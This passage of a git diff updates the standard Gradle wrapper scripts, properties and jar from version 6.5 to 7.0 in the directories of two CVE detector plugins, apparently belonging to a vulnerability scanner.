"%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve202121972/gradlew b/google/detectors/rce/cve202121972/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve202121972/gradlew +++ b/google/detectors/rce/cve202121972/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve202121972/gradlew.bat b/google/detectors/rce/cve202121972/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve202121972/gradlew.bat +++ b/google/detectors/rce/cve202121972/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve202141773/gradlew b/google/detectors/rce/cve202141773/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve202141773/gradlew +++ b/google/detectors/rce/cve202141773/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve202141773/gradlew.bat b/google/detectors/rce/cve202141773/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve202141773/gradlew.bat +++ b/google/detectors/rce/cve202141773/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% 